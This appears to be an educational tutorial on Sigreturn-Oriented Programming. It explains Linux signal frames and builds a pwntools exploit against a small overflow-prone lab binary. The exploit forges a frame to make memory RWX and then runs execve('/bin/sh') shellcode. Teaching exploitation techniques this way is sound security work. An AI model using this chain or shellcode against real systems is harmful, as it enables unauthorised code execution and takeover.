Sigreturn-Oriented Programming (SROP)

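Sigreturn-oriented programming is a technique which can be used when there are few gadgets available, or the available ones are not particularly useful. It requires only two gadgets: a way to manipulate rax and a syscall instruction. The trade-off, however, is that it requires a bigger overflow, because the payload has to carry a forged signal frame; the exact size depends on what you want to achieve.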

When a signal occurs in Linux, the kernel stores the state of the process by constructing a Signal Frame on the stack. Once the signal has been processed, the rt_sigreturn syscall is invoked to restore the process's state from the stack. rt_sigreturn, however, does not check whether the state it is restoring from the stack is the same as the state that the kernel pushed onto it. Usually, this is not a problem because rt_sigreturn is never called without a signal having been processed - the syscall for it in libc is actually defined to just return an error code. Interestingly enough, there is also no protection mechanism to ensure that rt_sigreturn is called only after a signal has been processed, which means that nothing stops an adversary from calling it and modifying the process's state by manipulating what is on the stack.

The Signal Frame

The signal frame represents the state of a process which is backed up onto the stack when a signal needs to be handled and has the following format:

When rt_sigreturn is invoked, the top 248 bytes of the stack will be restored into the above locations.
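As a rough illustration of those 248 bytes, the sketch below packs a frame by hand using only the standard library. The field order is an assumption: it follows the amd64 layout that pwntools' SigreturnFrame uses (31 slots of 8 bytes each), and the helper names build_frame and offset_of are made up for this example.

```python
import struct

# One 8-byte slot per entry, in stack order.
# Assumption: this mirrors the amd64 layout used by pwntools' SigreturnFrame.
FRAME_FIELDS = [
    "uc_flags", "&uc", "uc_stack.ss_sp", "uc_stack.ss_flags", "uc_stack.ss_size",
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
    "eflags", "csgsfs", "err", "trapno", "oldmask", "cr2",
    "&fpstate", "__reserved", "sigmask",
]

def build_frame(**values):
    """Pack a frame; unspecified slots are zero, except csgsfs (cs = 0x33)."""
    slots = {name: 0 for name in FRAME_FIELDS}
    slots["csgsfs"] = 0x33  # 64-bit user code segment, the default pwntools picks
    for name, value in values.items():
        if name not in slots:
            raise KeyError(name)
        slots[name] = value
    fmt = "<%dQ" % len(FRAME_FIELDS)
    return struct.pack(fmt, *(slots[name] for name in FRAME_FIELDS))

def offset_of(name):
    """Byte offset of a field from the start of the frame."""
    return FRAME_FIELDS.index(name) * 8

frame = build_frame(rax=0xA, rip=0x401014)
print(len(frame), hex(offset_of("rax")), hex(offset_of("rip")))
# prints: 248 0x90 0xa8
```

In practice SigreturnFrame does this packing for you; the point here is only that every general-purpose register, rsp and rip each have a fixed slot in the frame.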

The Exploit

Consider the following programme:

The highlighted code allows an adversary to read 768 bytes into a buffer of only 32 bytes, which results in a buffer overflow. To exploit it, we can inspect the code and calculate (alternatively, you can fuzz the programme) the number of padding bytes needed to reach the saved return address - this turns out to be 40. Since NX is enabled, we will need to build a ROP chain. Unfortunately, there is a little snag - there are barely any gadgets available.

So we will have to be more sophisticated and use Sigreturn-oriented programming. We see that there is a readily available syscall gadget, but there is no straightforward way to manipulate the rax register, which holds the syscall number when a syscall is issued.

Upon further inspection, the loc.write procedure invokes sys_write which is lucky for us because if sys_write is successful, it returns the number of characters written in rax. Now that we know how to manipulate rax, we turn our attention to the construction of our ROP chain.

The ROP chain begins by invoking loc.vuln again, so that it may in turn invoke loc.write. Once loc.vuln is called, the programme will ask us for input. We need to send 14 characters (the 15th being the \n at the end) to it, so that loc.write can then print those 15 characters and set rax equal to 15 as a result. Once these characters have been written, loc.vuln will return execution to our ROP chain. Since rax now contains the syscall number of rt_sigreturn, namely 15, the next entry in the ROP chain should be the address of the syscall gadget.
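The trick relies on write returning the number of bytes it wrote. A minimal sketch of that behaviour, using a pipe in place of the target's stdout (the pipe is only an assumption made so the example is self-contained):

```python
import os

SYS_RT_SIGRETURN = 15  # syscall number of rt_sigreturn on x86-64 (from the text)

read_end, write_end = os.pipe()
data = b"A" * 14 + b"\n"            # 14 characters plus the trailing newline
written = os.write(write_end, data)  # write(2) returns the number of bytes written
os.close(read_end)
os.close(write_end)

print(written, written == SYS_RT_SIGRETURN)
# prints: 15 True
```

In the target, that return value is left in rax when loc.vuln returns, which is exactly what the syscall gadget needs.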

rt_sigreturn will take the top 248 bytes of the stack and attempt to restore the state of the process from them. This means that all registers will be overwritten with values from the stack. Since we control what is on the stack via the buffer overflow, we also control what gets put into those registers. Therefore, the payload for the ROP chain should also contain an artificial signal frame immediately after the address of the syscall gadget, so that the frame sits at the top of the stack when rt_sigreturn runs.
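The resulting first-stage layout can be sketched with nothing but struct. The addresses are the ones used in the exploit in this article; the frame here is a zeroed placeholder rather than a real signal frame, and first_stage is a hypothetical helper name.

```python
import struct

PADDING_LEN = 40    # bytes up to the saved return address (from the text)
FRAME_LEN = 248     # size of the amd64 signal frame (from the text)
READ_LIMIT = 768    # bytes the vulnerable read accepts (from the text)

VULN = 0x40102E     # loc.vuln, as used in the exploit in this article
SYSCALL = 0x401014  # syscall gadget, as used in the exploit in this article

def first_stage(frame: bytes) -> bytes:
    """Layout: padding | &loc.vuln | &syscall | forged signal frame."""
    if len(frame) != FRAME_LEN:
        raise ValueError("unexpected frame size")
    return b"A" * PADDING_LEN + struct.pack("<QQ", VULN, SYSCALL) + frame

payload = first_stage(bytes(FRAME_LEN))  # zeroed placeholder frame
print(len(payload), len(payload) <= READ_LIMIT)
# prints: 304 True
```

The 304 bytes are why SROP needs a larger overflow than a short ROP chain: the whole frame has to fit behind the two return addresses.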

From here on, all that is left is figuring out a quick way to get a shell. I have opted for some shellcode which invokes execve with "/bin/sh". To do this we need to use sys_mprotect to change the permissions of a memory region to read-write-execute. Therefore, the registers inside our malicious signal frame should contain the following values:

  • rax - 0xA (the number for the sys_mprotect system call)
  • rdi - the beginning of the memory region whose permissions we want to change
  • rsi - the size of the memory region
  • rdx - 0x7 (RWX permissions)
  • rip - the address of the syscall gadget
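Two properties of these values are worth checking before building the frame: mprotect expects a page-aligned start address, and the region has to cover the memory we later execute from. A small sanity check, assuming 4 KiB pages and using the concrete values from the exploit in this article (mprotect_args_ok is a hypothetical helper):

```python
PROT_READ, PROT_WRITE, PROT_EXEC = 0x1, 0x2, 0x4
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages

def mprotect_args_ok(addr, length, new_stack):
    """True if addr is page-aligned and [addr, addr + length) contains new_stack."""
    page_aligned = addr % PAGE_SIZE == 0
    covers_stack = addr <= new_stack < addr + length
    return page_aligned and covers_stack

prot = PROT_READ | PROT_WRITE | PROT_EXEC
print(hex(prot), mprotect_args_ok(0x400000, 0x10000, 0x4010D8))
# prints: 0x7 True
```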

Now, it would have been nice if we had a way to preserve the value of the stack pointer, but that is not possible. Since we are forced to overwrite it, however, we might as well make do with what we can. We have no way of referring to the stack prior to rt_sigreturn, so we will just invent a new one!

In order to achieve this, we need to find a location in memory which contains the address of loc.vuln, even if it does so only coincidentally. The reason for this is that, after rt_sigreturn finishes, rip will be set to the syscall gadget, which will execute sys_mprotect. The instruction after the syscall is a ret, which means that the value at the location pointed to by rsp will be copied to rip, and we want execution to then proceed with loc.vuln again. This is why rsp should hold the address of a memory location that contains the address of loc.vuln.
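The effect of that ret can be modelled in a few lines. This is only a toy model: the dictionary stands in for process memory, and the two addresses are the ones used in the exploit in this article.

```python
VULN = 0x40102E             # loc.vuln
POINTER_TO_VULN = 0x4010D8  # location that happens to contain &loc.vuln

# Toy memory: address -> 8-byte value stored there
memory = {POINTER_TO_VULN: VULN}

def ret(rsp, memory):
    """Model of `ret`: pop the 8-byte value at rsp into rip."""
    rip = memory[rsp]
    return rip, rsp + 8

# State after the mprotect syscall: rsp still holds the value from the forged frame
rip, rsp = ret(POINTER_TO_VULN, memory)
print(hex(rip), hex(rsp))
# prints: 0x40102e 0x4010e0
```

So loc.vuln runs once more, this time with its stack inside the region that has just been made executable.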

Now that memory is executable, we proceed by exploiting loc.vuln yet another time in order to execute the shellcode which spawns a shell.

With this information we can construct an exploit using pwntools:

from pwn import *

context.clear(arch='amd64')

p = process("./srop")

syscall_address = 0x401014 # &syscall
sigreturn_number = 0xF
mprotect_number = 0xA
mprotect_permissions = 0x7

vuln_address = 0x40102e # &loc.vuln()
pointer_to_vuln_address = 0x4010d8 # &&loc.vuln() - using a debugger, I found that this location contains 0x40102e at runtime

padding = b'A' * 40

signal_frame = SigreturnFrame(kernel="amd64")
signal_frame.rax = mprotect_number
# It does not matter which memory we make RWX. For simplicity, we make a large chunk starting at the base address of the binary RWX; we just need to make sure that the new stack is contained in it.
signal_frame.rdi = 0x400000 # Beginning of the memory block (in this case, the binary)
signal_frame.rsi = 0x10000 # Size of the memory block
signal_frame.rdx = mprotect_permissions
signal_frame.rip = syscall_address # This will proceed to execute sys_mprotect
signal_frame.rsp = pointer_to_vuln_address # Beginning of the new stack

payload = padding + p64(vuln_address) + p64(syscall_address) + bytes(signal_frame)
p.sendline(payload)
p.recv()

# Send 15 characters (14*'A' + '\n')
p.sendline(b'A' * (sigreturn_number - 1))
p.recv()

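# GNU as treats ';' as a statement separator, so the assembly comments use /* */ instead
shellcode = asm("""
mov rdi, 0x68732f6e69622f /* "/bin/sh" in little-endian; the top byte is the NUL terminator */
push rdi
mov rdi, rsp              /* rdi = pointer to "/bin/sh" */
mov rax, 0x3b             /* execve syscall number */
xor rsi, rsi              /* argv = NULL */
xor rdx, rdx              /* envp = NULL */
syscall
""", arch="amd64")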

# The stack pointer will be moved 40 bytes down and the padding will take those 40 bytes, reaching pointer_to_vuln_address. We then add 8 bytes for the value contained at pointer_to_vuln_address itself and 8 more bytes for the slot which holds shellcode_address, so the shellcode starts 0x10 bytes past pointer_to_vuln_address.
shellcode_address = pointer_to_vuln_address + 0x10

payload = b'A'*40 + p64(shellcode_address) + shellcode
p.sendline(payload)

p.interactive()